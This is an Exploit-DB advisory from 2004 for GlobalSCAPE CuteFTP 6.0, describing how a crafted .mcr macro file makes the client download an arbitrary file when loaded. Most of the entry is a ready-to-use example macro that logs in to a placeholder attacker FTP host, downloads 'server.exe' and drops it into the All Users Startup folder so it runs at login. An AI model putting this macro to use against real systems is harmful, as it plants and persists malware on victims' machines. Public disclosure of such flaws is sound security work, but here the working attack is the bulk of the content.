GlobalScape - CuteFTP macros '.mcr' Local File Write

Author: ATmaCA
type: local
platform: windows
port: 
date_added: 2004-09-27 
date_updated: 2017-11-22 
verified: 1 
codes: OSVDB-18941 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comcuteftp60.exe

Application:  GlobalSCAPE CuteFTP V6.0
             http://www.globalscape.com/

Risk:         Medium

/*
e-mail: atmaca@prohack.net
web: http://www.prohack.net
*/

--The bug:

Atacker can create a crafted CuteFTP macro (*.mcr),
and when its loaded in the target computer, it can download the Arbitrary file
into the target users startup folder.

----example *.mcr macro----

Host FTP_HOST_HERE
Login Normal
User FTP_USER_HERE
Pass FTP_PASS_HERE
Connect
RemoteSelect server.exe
Download
LocalCwd C:\Documents and Settings\All Users\Start Menu\Programs\Startup\


# milw0rm.com [2004-09-28]